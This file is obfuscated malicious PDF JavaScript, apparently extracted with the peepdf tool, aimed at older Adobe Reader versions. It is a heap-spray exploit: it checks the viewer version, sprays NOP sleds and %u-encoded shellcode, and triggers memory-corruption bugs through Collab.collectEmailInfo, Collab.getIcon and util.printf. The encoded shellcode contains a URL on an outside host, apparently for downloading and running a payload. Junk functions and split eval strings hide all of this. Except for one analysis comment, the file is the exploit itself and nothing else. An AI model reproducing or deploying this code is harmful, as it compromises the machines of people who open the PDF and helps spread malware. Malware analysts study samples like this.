// peepdf comment: Javascript code located in object 7 (version 0)

var xyutequex = false;
var wochechuc = new Array();

function hethithyq() {}
function wexyixyat() {}
var thexye;

function cazethexy(cazethexy) {
    return true;
}
this.pecuwo = 24560;

function kazuq(mochyb, fabaquochu) {
    function thith(thith) {
        return thith;
    }
    while (mochyb.length * 2 < fabaquochu) mochyb += mochyb;
    this.quynopaque = 'quynopaque';
    mochyb = mochyb.substring(0, fabaquochu / 2);

    function natoj(natoj) {
        return natoj;
    }
    return mochyb;
}
this.laxyeth = false;

function tychux(gabuz) {
    var nithochyp = false;
    var xyicedax = 0x0c0c0c0c;
    var queth = false;
    var cotuchuvuq = false;
    var xyymichan = new Array('%u434', '3%u4343%', 'u4343%u0', 'FEB%u33', '5B%u66C', '9%u80B9', '%u800', '1%uEF33', '%uE243', '%uEBF', 'A%uE8', '05%uFFEC', '%uFFF', 'F%u8B7', 'F%uDF4E', '%uEFE', 'F%u64EF%', 'uE3AF%u9', 'F64%u', '42F3%u9F', '64%u6', 'EE7%u', 'EF03%uEF', 'EB%u64E', 'F%uB903%', 'u6187%', 'uE1A1%', 'u0703', '%uEF11', '%uEFEF', '%uAA66%u', 'B9EB%u', '7787%', 'u6511', '%u07E1%', 'uEF1F%', 'uEFEF%', 'uAA66%u', 'B9E7%uC', 'A87%u10', '5F%u0', '72D%uEF', '0D%uEF', 'EF%uAA6', '6%uB9E3', '%u0087', '%u0F21%u', '078F%uEF', '3B%uEFE', 'F%uAA6', '6%uB9F', 'F%u2E87%', 'u0A96', '%u0757', '%uEF29%', 'uEFEF', '%uAA66%u', 'AFFB%uD', '76F%u', '9A2C%u', '6615%uF', '7AA%uE', '806%uEF', 'EE%uB1E', 'F%u9A66%', 'u64CB%u', 'EBAA%uEE', '85%u6', '4B6%uF7B', 'A%u07B', '9%uEF64', '%uEFEF%', 'u87BF%uF', '5D9%u9', 'FC0%u78', '07%uEFEF', '%u66EF%u', 'F3AA%', 'u2A64%', 'u2F6C%u', '66BF%u', 'CFAA%u1', '087%uE', 'FEF%uBF', 'EF%uA', 'A64%u85', 'FB%uB6', 'ED%uB', 'A64%u07F', '7%uEF8E%', 'uEFEF', '%uAAE', 'C%u28CF', '%uB3E', 'F%uC191', '%u288A%u', 'EBAF%u8A', '97%uEF', 'EF%u9A1', '0%u64CF', '%uE3AA%', 'uEE85', '%u64B6%u', 'F7BA%u', 'AF07%u', 'EFEF%', 'u85EF', '%uB7E8%u', 'AAEC%uD', 'CCB%uBC', '34%u10BC', '%uCF9', 'A%uBC', 'BF%uAA64', '%u85F3%', 'uB6EA%', 'uBA64%', 'u07F7%uE', 'FCC%uE', 'FEF%uEF', '85%u9A1', '0%u64CF%', 'uE7AA%u', 'ED85%u', '64B6%u', 'F7BA%u', 'FF07%uEF', 'EF%u8', '5EF%u64', '10%uFF', 'AA%uEE85', '%u64B6%u', 'F7BA%', 'uEF07', '%uEFEF', '%uAEEF', '%uBDB4%u', '0EEC%u0', 'EEC%u', '0EEC%u0', 'EEC%u0', '36C%uB', '5EB%u64', 'BC%u0D3', '5%uBD1', '8%u0F', '10%u64B', 'A%u6403%', 'uE792%', 'uB264', '%uB9E3', '%u9C64%', 'u64D3', '%uF19', 'B%uEC97', '%uB91', 'C%u996', '4%uEC', 'CF%uDC1', 'C%uA626%', 'u42AE%u2', 'CEC%uDCB', '9%uE01', '9%uFF51%', 'u1DD5%u', 'E79B%u2', '12E%u', 'ECE2%', 'uAF1D', '%u1E04%u', '11D4%u', '9AB1%uB', '50A%u046', '4%uB5', '64%uECC', 'B%u8932', '%uE364', '%u64A4', '%uF3B5%u', '32EC%uEB', '64%uEC6', '4%uB12A', '%u2DB2%', 'uEFE7', '%u1B07%', 'u1011', '%uBA10%', 'uA3BD%u', 'A0A2%', 'uEFA1%', 'u7468%u', '7074%', 'u2F3A%u7', '72F%u7', '777%u', '652E%u6', '176%u67', '6E%u6C65', '%u7369', '%u6863%', 'u692D%u2', 'D6E%u6', '172%u6', '874%u', '642E%u2F', '65%u61', '6C%u646E', '%u6E6', '9%u2F6', '7%u786', '5%u2E', '65%u6870', '%u3F70', '%u3D78%u', '6470%u0', '066');

    function kychojop(kychojop) {
        return true;
    }
    xyythoch = xyymichan.join("");
    var quachytho = 9814;
    var thicho = 'thicho';
    var quafynuquo = eval("un" + "es" + "ca" + "pe" + "")(xyythoch);

    function cytichich(cytichich) {
        return cytichich;
    }
    var xyewud = 13398;
    if (gabuz == 1) {
        this.choxye = false;
        xyicedax = 0x30303030;

        function pedip(pedip) {
            return true;
        }
        quafynuquo = eval("un" + "es" + "ca" + "pe" + "")(xyythoch);
        this.chevyfemaq = "chevyfemaq";
    } else if (gabuz == 2) {
        var xyajy = 'xyajy';
        quafynuquo = eval("une" + "sca" + "pe" + "")(xyythoch);

        function xyisupody(xyisupody) {
            return true;
        }
    }
    var cyquelejaq = false;

    function thochy() {}
    this.jogixyu = 1171;
    var quovequiva = 0x400000;
    var parethece = false;
    var rycofychum = quafynuquo.length * 2;
    this.xyycha = false;
    var fabaquochu = quovequiva - (rycofychum + 0x38);
    this.fucaquich = 'fucaquich';
    var mochyb = eval("une" + "sca" + "pe" + "")("%u909" + "0%u90" + "90" + "");

    function wecaxya(wecaxya) {
        return true;
    }
    mochyb = kazuq(mochyb, fabaquochu);

    function chequoc() {}
    var bijuja = (xyicedax - 0x400000) / quovequiva;
    this.thyque = 'thyque';
    for (var zeduxy = 0; zeduxy < bijuja; zeduxy++) wochechuc[zeduxy] = mochyb + quafynuquo;

    function quesuz(quesuz) {
        return true;
    }
}
function xyejywed() {
    var xyixyuquac = 'xyixyuquac';
    var micachy = 0;
    this.chuthoc = "chuthoc";
    var kaxyucochi = app.viewerVersion.toString();

    function quothete(quothete) {
        return true;
    }
    app.clearTimeOut(thexye);
    this.chahach = "chahach";
    if ((kaxyucochi >= 8 && kaxyucochi < 8.102) || kaxyucochi < 7.1) {
        this.quakaxyi = false;
        tychux(0);

        function xyuchonyq(xyuchonyq) {
            return true;
        }
        var requochos = unescape("%u" + "0c" + "0c" + "%u" + "0c" + "0c" + "");
        var xyimy = 21631;
        while (requochos.length < 0xaf98) requochos += requochos;
        var xyeth = false;
        eval("this")["co" + "ll" + "ab" + "St" + "or" + "e" + ""] = eval("Col" + "lab" + "")["co" + "ll" + "ec" + "tE" + "ma" + "il" + "In" + "fo" + ""]({
            subj: "dilyxyyqu",
            msg: requochos
        });
        var jequed = 'jequed';
    }
    if ((kaxyucochi >= 8.102 && kaxyucochi < 8.104) || (kaxyucochi >= 9 && kaxyucochi < 9.1) || kaxyucochi <= 7.101) {
        try {
            if (app["do" + "c" + ""]["Co" + "ll" + "ab" + ""]["get" + "Ico" + "n" + ""]) {
                function dachi(dachi) {
                    return dachi;
                }
                tychux(2);
                this.thexyi = "thexyi";
                var dumizec = eval("un" + "es" + "ca" + "pe" + "")("%09");
                var masyxyuch = 'masyxyuch';
                this.xyychy = 'xyychy';
                while (dumizec.length < 0x4000) dumizec += dumizec;
                this.xyyxyas = 11155;
                dumizec = "N." + dumizec;

                function chiquuchib(chiquuchib) {
                    return true;
                }
                eval("ap" + "p" + "")["do" + "c" + ""]["Co" + "ll" + "ab" + ""]["ge" + "tI" + "co" + "n" + ""](dumizec);
                var thada = 'thada';
                micachy = 1;

                function xyuchocho(xyuchocho) {
                    return true;
                }
            } else micachy = 1;
        } catch (e) {
            micachy = 1;
        }
        if (micachy == 1) {
            if (kaxyucochi == 8.102 || kaxyucochi == 7.1) {
                tychux(1);
                this.dykexy = 15280;
                var tyxyecechi = 12954;
                eval("ut" + "il" + "")["pri" + "ntf" + ""]("%4" + "50" + "00" + "f" + "", "1299999999999999" + "9999888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "88888888" + "");
            }
        }
    }
}
app.chiny = xyejywed;

function noquifyqu(noquifyqu) {
    return noquifyqu;
}
thexye = app.setTimeOut("app.chiny()", 10);

